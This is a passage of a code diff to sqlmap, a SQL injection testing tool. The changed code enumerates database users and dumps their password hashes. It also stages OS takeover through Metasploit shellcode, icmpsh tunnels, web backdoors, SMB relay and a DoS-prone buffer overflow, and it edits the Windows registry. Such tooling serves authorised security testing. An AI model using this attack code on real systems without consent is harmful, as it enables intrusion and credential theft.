conf.tbl.split(',') + if conf.exclude: + tbls = [_ for _ in tbls if re.search(conf.exclude, _, re.I) is None] + whereTblsQuery = " AND (" + " OR ".join("%s = '%s'" % (tblCond, unsafeSQLIdentificatorNaming(tbl)) for tbl in tbls) + ")" + infoMsgTbl = " for table%s '%s'" % ("s" if len(tbls) > 1 else "", ", ".join(unsafeSQLIdentificatorNaming(tbl) for tbl in tbls)) + + if conf.db == CURRENT_DB: + conf.db = self.getCurrentDb() + + if dbCond: + if conf.db: + _ = conf.db.split(',') + whereDbsQuery = " AND (" + " OR ".join("%s = '%s'" % (dbCond, unsafeSQLIdentificatorNaming(db)) for db in _) + ")" + infoMsgDb = " in database%s '%s'" % ("s" if len(_) > 1 else "", ", ".join(unsafeSQLIdentificatorNaming(db) for db in _)) + elif conf.excludeSysDbs: + whereDbsQuery = "".join(" AND %s != '%s'" % (dbCond, unsafeSQLIdentificatorNaming(db)) for db in self.excludeDbsList) + msg = "skipping system database%s '%s'" % ("s" if len(self.excludeDbsList) > 1 else "", ", ".join(unsafeSQLIdentificatorNaming(db) for db in self.excludeDbsList)) + logger.info(msg) + else: + infoMsgDb = " across all databases" - if conf.db and conf.db != CURRENT_DB: - _ = conf.db.split(",") - whereDbsQuery = " AND (" + " OR ".join("%s = '%s'" % (dbCond, unsafeSQLIdentificatorNaming(db)) for db in _) + ")" - infoMsgDb = " in database%s '%s'" % ("s" if len(_) > 1 else "", ", ".join(db for db in _)) - elif conf.excludeSysDbs: - whereDbsQuery = "".join(" AND %s != '%s'" % (dbCond, unsafeSQLIdentificatorNaming(db)) for db in self.excludeDbsList) - infoMsg2 = "skipping system database%s '%s'" % ("s" if len(self.excludeDbsList) > 1 else "", ", ".join(db for db in self.excludeDbsList)) - logger.info(infoMsg2) - else: - infoMsgDb = " across all databases" + 
if conf.exclude: + whereDbsQuery += " AND %s NOT LIKE '%s'" % (dbCond, re.sub(r"\.[*+]", '%', conf.exclude._original)) logger.info("%s%s%s" % (infoMsg, infoMsgTbl, infoMsgDb)) @@ -414,13 +454,13 @@ def searchColumn(self): # column(s) provided values = [] - for db in conf.db.split(","): - for tbl in conf.tbl.split(","): - values.append([db, tbl]) + for db in conf.db.split(','): + for tbl in conf.tbl.split(','): + values.append([safeSQLIdentificatorNaming(db), safeSQLIdentificatorNaming(tbl, True)]) for db, tbl in filterPairValues(values): db = safeSQLIdentificatorNaming(db) - tbls = tbl.split(",") + tbls = tbl.split(',') if not isNoneValue(tbl) else [] for tbl in tbls: tbl = safeSQLIdentificatorNaming(tbl, True) @@ -454,8 +494,8 @@ def searchColumn(self): if not conf.db: infoMsg = "fetching number of databases with tables containing column" if colConsider == "1": - infoMsg += "s like" - infoMsg += " '%s'" % column + infoMsg += "s LIKE" + infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(column) logger.info("%s%s%s" % (infoMsg, infoMsgTbl, infoMsgDb)) query = rootQuery.blind.count @@ -465,9 +505,9 @@ def searchColumn(self): if not isNumPosStrValue(count): warnMsg = "no databases have tables containing column" if colConsider == "1": - warnMsg += "s like" - warnMsg += " '%s'" % column - logger.warn("%s%s" % (warnMsg, infoMsgTbl)) + warnMsg += "s LIKE" + warnMsg += " '%s'" % unsafeSQLIdentificatorNaming(column) + logger.warning("%s%s" % (warnMsg, infoMsgTbl)) continue @@ -487,7 +527,8 @@ def searchColumn(self): if db not in foundCols[column]: foundCols[column][db] = [] else: - for db in conf.db.split(","): + for db in conf.db.split(',') if conf.db else (self.getCurrentDb(),): + db = safeSQLIdentificatorNaming(db) if db not in foundCols[column]: foundCols[column][db] = [] @@ -496,22 +537,25 @@ def searchColumn(self): for column, dbData in foundCols.items(): colQuery = "%s%s" % (colCond, colCondParam) - colQuery = colQuery % column + colQuery = colQuery % unsafeSQLIdentificatorNaming(column) for db in dbData: - db = safeSQLIdentificatorNaming(db) conf.db = origDb conf.tbl = origTbl infoMsg = "fetching number of tables containing column" if colConsider == "1": - infoMsg += "s like" - infoMsg += " '%s' in database '%s'" % (unsafeSQLIdentificatorNaming(column), db) + infoMsg += "s LIKE" + infoMsg += " '%s' in database '%s'" % (unsafeSQLIdentificatorNaming(column), unsafeSQLIdentificatorNaming(db)) logger.info(infoMsg) query = rootQuery.blind.count2 - query = query % db - query += " AND %s" % colQuery + if not re.search(r"(?i)%s\Z" % METADB_SUFFIX, db or ""): + query = query % unsafeSQLIdentificatorNaming(db) + query += " AND %s" % colQuery + else: + query = query % colQuery + query += whereTblsQuery count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) @@ -519,10 +563,10 @@ def searchColumn(self): if not isNumPosStrValue(count): warnMsg = "no tables contain column" if colConsider == "1": - warnMsg += "s like" - warnMsg += " '%s' " % column - warnMsg += "in database '%s'" % db - logger.warn(warnMsg) + warnMsg += "s LIKE" + warnMsg += " '%s' " % unsafeSQLIdentificatorNaming(column) + warnMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(db) + logger.warning(warnMsg) continue @@ -530,9 +574,17 @@ def searchColumn(self): for index in indexRange: query = rootQuery.blind.query2 - query = query % db - query += " AND %s" % colQuery - query += whereTblsQuery + + if re.search(r"(?i)%s\Z" % METADB_SUFFIX, db or ""): + query = query % (colQuery + 
whereTblsQuery) + elif query.endswith("'%s')"): + query = query[:-1] + " AND %s)" % (colQuery + whereTblsQuery) + elif " ORDER BY " in query: + query = query.replace(" ORDER BY ", " AND %s ORDER BY " % (colQuery + whereTblsQuery)) + else: + query += " AND %s" % (colQuery + whereTblsQuery) + + query = safeStringFormat(query, unsafeSQLIdentificatorNaming(db)) query = agent.limitQuery(index, query) tbl = unArrayizeValue(inject.getValue(query, union=False, error=False)) @@ -568,10 +620,10 @@ def searchColumn(self): else: warnMsg = "no databases have tables containing any of the " warnMsg += "provided columns" - logger.warn(warnMsg) + logger.warning(warnMsg) def search(self): - if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): + if Backend.getIdentifiedDbms() in UPPER_CASE_DBMSES: for item in ('db', 'tbl', 'col'): if getattr(conf, item, None): setattr(conf, item, getattr(conf, item).upper()) diff --git a/plugins/generic/syntax.py b/plugins/generic/syntax.py index 05b658d0095..5da7b985298 100644 --- a/plugins/generic/syntax.py +++ b/plugins/generic/syntax.py @@ -1,15 +1,19 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import re +from lib.core.common import Backend +from lib.core.convert import getBytes +from lib.core.data import conf +from lib.core.enums import DBMS from lib.core.exception import SqlmapUndefinedMethod -class Syntax: +class Syntax(object): """ This class defines generic syntax functionalities for plugins. """ @@ -22,8 +26,18 @@ def _escape(expression, quote=True, escaper=None): retVal = expression if quote: - for item in re.findall(r"'[^']*'+", expression, re.S): - retVal = retVal.replace(item, escaper(item[1:-1])) + for item in re.findall(r"'[^']*'+", expression): + original = item[1:-1] + if original: + if Backend.isDbms(DBMS.SQLITE) and "X%s" % item in expression: + continue + if re.search(r"\[(SLEEPTIME|RAND)", original) is None: # e.g. 
'[SLEEPTIME]' marker + replacement = escaper(original) if not conf.noEscape else original + + if replacement != original: + retVal = retVal.replace(item, replacement) + elif len(original) != len(getBytes(original)) and "n'%s'" % original not in retVal and Backend.getDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.ORACLE, DBMS.MSSQL): + retVal = retVal.replace("'%s'" % original, "n'%s'" % original) else: retVal = escaper(expression) diff --git a/plugins/generic/takeover.py b/plugins/generic/takeover.py index 412802cc064..eda399e614c 100644 --- a/plugins/generic/takeover.py +++ b/plugins/generic/takeover.py @@ -1,25 +1,30 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import os from lib.core.common import Backend -from lib.core.common import isTechniqueAvailable +from lib.core.common import getSafeExString +from lib.core.common import isDigit +from lib.core.common import isStackingAvailable +from lib.core.common import openFile from lib.core.common import readInput from lib.core.common import runningAsAdmin from lib.core.data import conf +from lib.core.data import kb from lib.core.data import logger from lib.core.enums import DBMS from lib.core.enums import OS -from lib.core.enums import PAYLOAD +from lib.core.exception import SqlmapFilePathException from lib.core.exception import SqlmapMissingDependence from lib.core.exception import SqlmapMissingMandatoryOptionException from lib.core.exception import SqlmapMissingPrivileges from lib.core.exception import SqlmapNotVulnerableException +from lib.core.exception import SqlmapSystemException from lib.core.exception import SqlmapUndefinedMethod from lib.core.exception import SqlmapUnsupportedDBMSException from lib.takeover.abstraction import Abstraction @@ -27,23 +32,21 @@ from lib.takeover.metasploit import Metasploit from lib.takeover.registry import Registry -from plugins.generic.misc import Miscellaneous - -class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous): +class Takeover(Abstraction, Metasploit, ICMPsh, Registry): """ This class defines generic OS takeover functionalities for plugins. 
""" def __init__(self): - self.cmdTblName = "sqlmapoutput" + self.cmdTblName = ("%soutput" % conf.tablePrefix) self.tblField = "data" Abstraction.__init__(self) def osCmd(self): - if isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) or conf.direct: + if isStackingAvailable() or conf.direct: web = False - elif not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) and Backend.isDbms(DBMS.MYSQL): + elif not isStackingAvailable() and Backend.isDbms(DBMS.MYSQL): infoMsg = "going to use a web backdoor for command execution" logger.info(infoMsg) @@ -63,9 +66,9 @@ def osCmd(self): self.cleanup(web=web) def osShell(self): - if isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) or conf.direct: + if isStackingAvailable() or conf.direct: web = False - elif not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) and Backend.isDbms(DBMS.MYSQL): + elif not isStackingAvailable() and Backend.isDbms(DBMS.MYSQL): infoMsg = "going to use a web backdoor for command prompt" logger.info(infoMsg) @@ -77,7 +80,20 @@ def osShell(self): raise SqlmapNotVulnerableException(errMsg) self.getRemoteTempPath() - self.initEnv(web=web) + + try: + self.initEnv(web=web) + except SqlmapFilePathException: + if not web and not conf.direct: + infoMsg = "falling back to web backdoor method..." + logger.info(infoMsg) + + web = True + kb.udfFail = True + + self.initEnv(web=web) + else: + raise if not web or (web and self.webBackdoorUrl is not None): self.shell() @@ -87,6 +103,8 @@ def osShell(self): def osPwn(self): goUdf = False + fallbackToWeb = False + setupSuccess = False self.checkDbmsOs() @@ -94,21 +112,17 @@ def osPwn(self): msg = "how do you want to establish the tunnel?" msg += "\n[1] TCP: Metasploit Framework (default)" msg += "\n[2] ICMP: icmpsh - ICMP tunneling" - valids = (1, 2) while True: - tunnel = readInput(msg, default=1) + tunnel = readInput(msg, default='1') - if isinstance(tunnel, basestring) and tunnel.isdigit() and int(tunnel) in valids: + if isDigit(tunnel) and int(tunnel) in (1, 2): tunnel = int(tunnel) break - elif isinstance(tunnel, int) and tunnel in valids: - break - else: - warnMsg = "invalid value, valid values are 1 and 2" - logger.warn(warnMsg) + warnMsg = "invalid value, valid values are '1' and '2'" + logger.warning(warnMsg) else: tunnel = 1 @@ -127,20 +141,23 @@ def osPwn(self): raise SqlmapMissingPrivileges(errMsg) try: - from impacket import ImpactDecoder - from impacket import ImpactPacket + __import__("impacket") except ImportError: errMsg = "sqlmap requires 'python-impacket' third-party library " errMsg += "in order to run icmpsh master. You can get it at " - errMsg += "http://code.google.com/p/impacket/downloads/list" + errMsg += "https://github.com/SecureAuthCorp/impacket" raise SqlmapMissingDependence(errMsg) - sysIgnoreIcmp = "/proc/sys/net/ipv4/icmp_echo_ignore_all" + filename = "/proc/sys/net/ipv4/icmp_echo_ignore_all" - if os.path.exists(sysIgnoreIcmp): - fp = open(sysIgnoreIcmp, "wb") - fp.write("1") - fp.close() + if os.path.exists(filename): + try: + with openFile(filename, "wb") as f: + f.write("1") + except IOError as ex: + errMsg = "there has been a file opening/writing error " + errMsg += "for filename '%s' ('%s')" % (filename, getSafeExString(ex)) + raise SqlmapSystemException(errMsg) else: errMsg = "you need to disable ICMP replies by your machine " errMsg += "system-wide. 
For example run on Linux/Unix:\n" @@ -153,10 +170,11 @@ def osPwn(self): if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): self.sysUdfs.pop("sys_bineval") - if isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) or conf.direct: + self.getRemoteTempPath() + + if isStackingAvailable() or conf.direct: web = False - self.getRemoteTempPath() self.initEnv(web=web) if tunnel == 1: @@ -164,51 +182,65 @@ def osPwn(self): msg = "how do you want to execute the Metasploit shellcode " msg += "on the back-end database underlying operating system?" msg += "\n[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)" - msg += "\n[2] Via shellcodeexec (file system way, preferred on 64-bit systems)" + msg += "\n[2] Via 'shellcodeexec' (file system way, preferred on 64-bit systems)" while True: - choice = readInput(msg, default=1) + choice = readInput(msg, default='1') - if isinstance(choice, basestring) and choice.isdigit() and int(choice) in (1, 2): + if isDigit(choice) and int(choice) in (1, 2): choice = int(choice) break - elif isinstance(choice, int) and choice in (1, 2): - break - else: - warnMsg = "invalid value, valid values are 1 and 2" - logger.warn(warnMsg) + warnMsg = "invalid value, valid values are '1' and '2'" + logger.warning(warnMsg) if choice == 1: goUdf = True if goUdf: exitfunc = "thread" + setupSuccess = True else: exitfunc = "process" self.createMsfShellcode(exitfunc=exitfunc, format="raw", extra="BufferRegister=EAX", encode="x86/alpha_mixed") if not goUdf: - self.uploadShellcodeexec() + setupSuccess = self.uploadShellcodeexec(web=web) + + if setupSuccess is not True: + if Backend.isDbms(DBMS.MYSQL): + fallbackToWeb = True + else: + msg = "unable to mount the operating system takeover" + raise SqlmapFilePathException(msg) + + if Backend.isOs(OS.WINDOWS) and Backend.isDbms(DBMS.MYSQL) and conf.privEsc: + debugMsg = "by default MySQL on Windows runs as SYSTEM " + debugMsg += "user, no need to privilege escalate" + logger.debug(debugMsg) - if Backend.isOs(OS.WINDOWS) and conf.privEsc: - if Backend.isDbms(DBMS.MYSQL): - debugMsg = "by default MySQL on Windows runs as SYSTEM " - debugMsg += "user, no need to privilege escalate" - logger.debug(debugMsg) elif tunnel == 2: - self.uploadIcmpshSlave(web=web) - self.icmpPwn() + setupSuccess = self.uploadIcmpshSlave(web=web) - elif not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) and Backend.isDbms(DBMS.MYSQL): + if setupSuccess is not True: + if Backend.isDbms(DBMS.MYSQL): + fallbackToWeb = True + else: + msg = "unable to mount the operating system takeover" + raise SqlmapFilePathException(msg) + + if not setupSuccess and Backend.isDbms(DBMS.MYSQL) and not conf.direct and (not isStackingAvailable() or fallbackToWeb): web = True - infoMsg = "going to use a web backdoor to establish the tunnel" + if fallbackToWeb: + infoMsg = "falling back to web backdoor to establish the tunnel" + else: + infoMsg = "going to use a web backdoor to establish the tunnel" logger.info(infoMsg) - self.initEnv(web=web) + self.initEnv(web=web, forceInit=fallbackToWeb) if self.webBackdoorUrl: if not Backend.isOs(OS.WINDOWS) and conf.privEsc: @@ -219,24 +251,31 @@ def osPwn(self): warnMsg = "sqlmap does not implement any operating system " warnMsg += "user privilege escalation technique when the " warnMsg += "back-end DBMS underlying system is not Windows" - logger.warn(warnMsg) - - self.getRemoteTempPath() + logger.warning(warnMsg) if tunnel == 1: self.createMsfShellcode(exitfunc="process", format="raw", extra="BufferRegister=EAX", 
encode="x86/alpha_mixed") - self.uploadShellcodeexec(web=web) + setupSuccess = self.uploadShellcodeexec(web=web) + + if setupSuccess is not True: + msg = "unable to mount the operating system takeover" + raise SqlmapFilePathException(msg) + elif tunnel == 2: - self.uploadIcmpshSlave(web=web) - self.icmpPwn() - else: - errMsg = "unable to prompt for an out-of-band session because " - errMsg += "stacked queries SQL injection is not supported" - raise SqlmapNotVulnerableException(errMsg) + setupSuccess = self.uploadIcmpshSlave(web=web) + + if setupSuccess is not True: + msg = "unable to mount the operating system takeover" + raise SqlmapFilePathException(msg) - if tunnel == 1: - if not web or (web and self.webBackdoorUrl is not None): + if setupSuccess: + if tunnel == 1: self.pwn(goUdf) + elif tunnel == 2: + self.icmpPwn() + else: + errMsg = "unable to prompt for an out-of-band session" + raise SqlmapNotVulnerableException(errMsg) if not conf.cleanup: self.cleanup(web=web) @@ -250,7 +289,7 @@ def osSmb(self): errMsg += "relay attack" raise SqlmapUnsupportedDBMSException(errMsg) - if not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) and not conf.direct: + if not isStackingAvailable() and not conf.direct: if Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.MSSQL): errMsg = "on this back-end DBMS it is only possible to " errMsg += "perform the SMB relay attack if stacked " @@ -287,12 +326,12 @@ def osSmb(self): printWarn = False if printWarn: - logger.warn(warnMsg) + logger.warning(warnMsg) self.smb() def osBof(self): - if not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) and not conf.direct: + if not isStackingAvailable() and not conf.direct: return if not Backend.isDbms(DBMS.MSSQL) or not Backend.isVersionWithin(("2000", "2005")): @@ -309,14 +348,8 @@ def osBof(self): msg = "this technique is likely to DoS the DBMS process, are you " msg += "sure that you want to carry with the exploit? [y/N] " - inp = readInput(msg, default="N") - - if inp and inp[0].lower() == "y": - dos = True - else: - dos = False - if dos: + if readInput(msg, default='N', boolean=True): self.initEnv(mandatory=False, detailed=True) self.getRemoteTempPath() self.createMsfShellcode(exitfunc="seh", format="raw", extra="-b 27", encode=True) @@ -328,7 +361,7 @@ def uncPathRequest(self): raise SqlmapUndefinedMethod(errMsg) def _regInit(self): - if not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) and not conf.direct: + if not isStackingAvailable() and not conf.direct: return self.checkDbmsOs() @@ -345,7 +378,7 @@ def regRead(self): self._regInit() if not conf.regKey: - default = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" + default = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion" msg = "which registry key do you want to read? [%s] " % default regKey = readInput(msg, default=default) else: @@ -358,7 +391,7 @@ def regRead(self): else: regVal = conf.regVal - infoMsg = "reading Windows registry path '%s\%s' " % (regKey, regVal) + infoMsg = "reading Windows registry path '%s\\%s' " % (regKey, regVal) logger.info(infoMsg) return self.readRegKey(regKey, regVal, True) @@ -403,7 +436,7 @@ def regAdd(self): else: regType = conf.regType - infoMsg = "adding Windows registry path '%s\%s' " % (regKey, regVal) + infoMsg = "adding Windows registry path '%s\\%s' " % (regKey, regVal) infoMsg += "with data '%s'. " % regData infoMsg += "This will work only if the user running the database " infoMsg += "process has privileges to modify the Windows registry." 
@@ -435,13 +468,12 @@ def regDel(self): regVal = conf.regVal message = "are you sure that you want to delete the Windows " - message += "registry path '%s\%s? [y/N] " % (regKey, regVal) - output = readInput(message, default="N") + message += "registry path '%s\\%s? [y/N] " % (regKey, regVal) - if output and output[0] not in ("Y", "y"): + if not readInput(message, default='N', boolean=True): return - infoMsg = "deleting Windows registry path '%s\%s'. " % (regKey, regVal) + infoMsg = "deleting Windows registry path '%s\\%s'. " % (regKey, regVal) infoMsg += "This will work only if the user running the database " infoMsg += "process has privileges to modify the Windows registry." logger.info(infoMsg) diff --git a/plugins/generic/users.py b/plugins/generic/users.py index 438c2929b61..ccd1b7747e4 100644 --- a/plugins/generic/users.py +++ b/plugins/generic/users.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import re @@ -12,38 +12,45 @@ from lib.core.common import Backend from lib.core.common import filterPairValues from lib.core.common import getLimitRange -from lib.core.common import getUnicode from lib.core.common import isAdminFromPrivileges +from lib.core.common import isDBMSVersionAtLeast from lib.core.common import isInferenceAvailable from lib.core.common import isNoneValue +from lib.core.common import isNullValue from lib.core.common import isNumPosStrValue from lib.core.common import isTechniqueAvailable from lib.core.common import parsePasswordHash -from lib.core.common import randomStr from lib.core.common import readInput from lib.core.common import unArrayizeValue -from lib.core.convert import hexencode +from lib.core.compat import xrange +from lib.core.convert import encodeHex +from lib.core.convert import getUnicode from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.data import queries +from lib.core.dicts import DB2_PRIVS +from lib.core.dicts import FIREBIRD_PRIVS +from lib.core.dicts import INFORMIX_PRIVS from lib.core.dicts import MYSQL_PRIVS from lib.core.dicts import PGSQL_PRIVS -from lib.core.dicts import FIREBIRD_PRIVS -from lib.core.dicts import DB2_PRIVS from lib.core.enums import CHARSET_TYPE from lib.core.enums import DBMS from lib.core.enums import EXPECTED +from lib.core.enums import FORK from lib.core.enums import PAYLOAD from lib.core.exception import SqlmapNoneDataException from lib.core.exception import SqlmapUserQuitException +from lib.core.settings import CURRENT_USER +from lib.core.settings import PLUS_ONE_DBMSES from lib.core.threads import getCurrentThreadData from lib.request import inject from lib.utils.hash import attackCachedUsersPasswords from lib.utils.hash import storeHashesToFile from lib.utils.pivotdumptable import pivotDumpTable +from thirdparty.six.moves import zip as _zip -class Users: +class Users(object): """ This class defines users' enumeration functionalities for plugins. 
""" @@ -71,16 +78,22 @@ def isDba(self, user=None): infoMsg = "testing if current user is DBA" logger.info(infoMsg) + query = None + if Backend.isDbms(DBMS.MYSQL): self.getCurrentUser() - query = queries[Backend.getIdentifiedDbms()].is_dba.query % (kb.data.currentUser.split("@")[0] if kb.data.currentUser else None) + if Backend.isDbms(DBMS.MYSQL) and Backend.isFork(FORK.DRIZZLE): + kb.data.isDba = "root" in (kb.data.currentUser or "") + elif kb.data.currentUser: + query = queries[Backend.getIdentifiedDbms()].is_dba.query % kb.data.currentUser.split("@")[0] elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE) and user is not None: query = queries[Backend.getIdentifiedDbms()].is_dba.query2 % user else: query = queries[Backend.getIdentifiedDbms()].is_dba.query - query = agent.forgeCaseStatement(query) - kb.data.isDba = inject.checkBooleanExpression(query) + if query: + query = agent.forgeCaseStatement(query) + kb.data.isDba = inject.checkBooleanExpression(query) or False return kb.data.isDba @@ -92,42 +105,57 @@ def getUsers(self): condition = (Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2005", "2008"))) condition |= (Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema) + condition |= (Backend.isDbms(DBMS.H2) and not isDBMSVersionAtLeast("2")) if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: - if condition: + if Backend.isDbms(DBMS.MYSQL) and Backend.isFork(FORK.DRIZZLE): + query = rootQuery.inband.query3 + elif condition: query = rootQuery.inband.query2 else: query = rootQuery.inband.query + values = inject.getValue(query, blind=False, time=False) if not isNoneValue(values): - kb.data.cachedUsers = arrayizeValue(values) + kb.data.cachedUsers = [] + for value in arrayizeValue(values): + value = unArrayizeValue(value) + if not isNoneValue(value): + kb.data.cachedUsers.append(value) if not kb.data.cachedUsers and isInferenceAvailable() and not conf.direct: infoMsg = "fetching number of database users" logger.info(infoMsg) - if condition: + if Backend.isDbms(DBMS.MYSQL) and Backend.isFork(FORK.DRIZZLE): + query = rootQuery.blind.count3 + elif condition: query = rootQuery.blind.count2 else: query = rootQuery.blind.count count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) - if not isNumPosStrValue(count): + if count == 0: + return kb.data.cachedUsers + elif not isNumPosStrValue(count): errMsg = "unable to retrieve the number of database users" raise SqlmapNoneDataException(errMsg) - plusOne = Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2) + plusOne = Backend.getIdentifiedDbms() in PLUS_ONE_DBMSES indexRange = getLimitRange(count, plusOne=plusOne) for index in indexRange: if Backend.getIdentifiedDbms() in (DBMS.SYBASE, DBMS.MAXDB): query = rootQuery.blind.query % (kb.data.cachedUsers[-1] if kb.data.cachedUsers else " ") + elif Backend.isDbms(DBMS.MYSQL) and Backend.isFork(FORK.DRIZZLE): + query = rootQuery.blind.query3 % index elif condition: query = rootQuery.blind.query2 % index else: query = rootQuery.blind.query % index + user = unArrayizeValue(inject.getValue(query, union=False, error=False)) if user: @@ -144,7 +172,7 @@ def getPasswordHashes(self): rootQuery = queries[Backend.getIdentifiedDbms()].passwords - if conf.user == "CU": + if conf.user == CURRENT_USER: infoMsg += " for current user" conf.user = self.getCurrentUser() @@ -154,18 +182,18 @@ def getPasswordHashes(self): conf.user = conf.user.upper() if 
conf.user: - users = conf.user.split(",") + users = conf.user.split(',') if Backend.isDbms(DBMS.MYSQL): for user in users: - parsedUser = re.search("[\047]*(.*?)[\047]*\@", user) + parsedUser = re.search(r"['\"]?(.*?)['\"]?\@", user) if parsedUser: users[users.index(user)] = parsedUser.groups()[0] else: users = [] - users = filter(None, users) + users = [_ for _ in users if _] if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: if Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2005", "2008")): @@ -180,13 +208,12 @@ def getPasswordHashes(self): query += " OR ".join("%s = '%s'" % (condition, user) for user in sorted(users)) if Backend.isDbms(DBMS.SYBASE): - randStr = randomStr() getCurrentThreadData().disableStdOut = True - retVal = pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.name' % randStr, '%s.password' % randStr], blind=False) + retVal = pivotDumpTable("(%s) AS %s" % (query, kb.aliasName), ['%s.name' % kb.aliasName, '%s.password' % kb.aliasName], blind=False) if retVal: - for user, password in filterPairValues(zip(retVal[0]["%s.name" % randStr], retVal[0]["%s.password" % randStr])): + for user, password in filterPairValues(_zip(retVal[0]["%s.name" % kb.aliasName], retVal[0]["%s.password" % kb.aliasName])): if user not in kb.data.cachedUsersPasswords: kb.data.cachedUsersPasswords[user] = [password] else: @@ -196,6 +223,11 @@ def getPasswordHashes(self): else: values = inject.getValue(query, blind=False, time=False) + if Backend.isDbms(DBMS.MSSQL) and isNoneValue(values): + values = inject.getValue(query.replace("master.dbo.fn_varbintohexstr", "sys.fn_sqlvarbasetostr"), blind=False, time=False) + elif Backend.isDbms(DBMS.MYSQL) and (isNoneValue(values) or all(len(value) == 2 and (isNullValue(value[1]) or isNoneValue(value[1])) for value in values)): + values = inject.getValue(query.replace("authentication_string", "password"), blind=False, time=False) + for user, password in filterPairValues(values): if not user or user == " ": continue @@ -208,12 +240,14 @@ def getPasswordHashes(self): kb.data.cachedUsersPasswords[user].append(password) if not kb.data.cachedUsersPasswords and isInferenceAvailable() and not conf.direct: + fallback = False + if not len(users): users = self.getUsers() if Backend.isDbms(DBMS.MYSQL): for user in users: - parsedUser = re.search("[\047]*(.*?)[\047]*\@", user) + parsedUser = re.search(r"['\"]?(.*?)['\"]?\@", user) if parsedUser: users[users.index(user)] = parsedUser.groups()[0] @@ -221,14 +255,13 @@ def getPasswordHashes(self): if Backend.isDbms(DBMS.SYBASE): getCurrentThreadData().disableStdOut = True - randStr = randomStr() query = rootQuery.inband.query - retVal = pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.name' % randStr, '%s.password' % randStr], blind=True) + retVal = pivotDumpTable("(%s) AS %s" % (query, kb.aliasName), ['%s.name' % kb.aliasName, '%s.password' % kb.aliasName], blind=True) if retVal: - for user, password in filterPairValues(zip(retVal[0]["%s.name" % randStr], retVal[0]["%s.password" % randStr])): - password = "0x%s" % hexencode(password).upper() + for user, password in filterPairValues(_zip(retVal[0]["%s.name" % kb.aliasName], retVal[0]["%s.password" % kb.aliasName])): + password = "0x%s" % encodeHex(password, binary=False).upper() if user not in kb.data.cachedUsersPasswords: kb.data.cachedUsersPasswords[user] = [password] @@ -240,32 +273,45 @@ def getPasswordHashes(self): retrievedUsers = set() for user in users: + user = 
unArrayizeValue(user) + if user in retrievedUsers: continue - infoMsg = "fetching number of password hashes " - infoMsg += "for user '%s'" % user - logger.info(infoMsg) - - if Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2005", "2008")): - query = rootQuery.blind.count2 % user + if Backend.getIdentifiedDbms() in (DBMS.INFORMIX, DBMS.VIRTUOSO): + count = 1 else: - query = rootQuery.blind.count % user + infoMsg = "fetching number of password hashes " + infoMsg += "for user '%s'" % user + logger.info(infoMsg) - count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) + if Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2005", "2008")): + query = rootQuery.blind.count2 % user + else: + query = rootQuery.blind.count % user - if not isNumPosStrValue(count): - warnMsg = "unable to retrieve the number of password " - warnMsg += "hashes for user '%s'" % user - logger.warn(warnMsg) - continue + count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) + + if not isNumPosStrValue(count): + if Backend.isDbms(DBMS.MSSQL): + fallback = True + count = inject.getValue(query.replace("master.dbo.fn_varbintohexstr", "sys.fn_sqlvarbasetostr"), union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) + elif Backend.isDbms(DBMS.MYSQL): + fallback = True + count = inject.getValue(query.replace("authentication_string", "password"), union=False, error=False, expected=EXPECTED.INT, 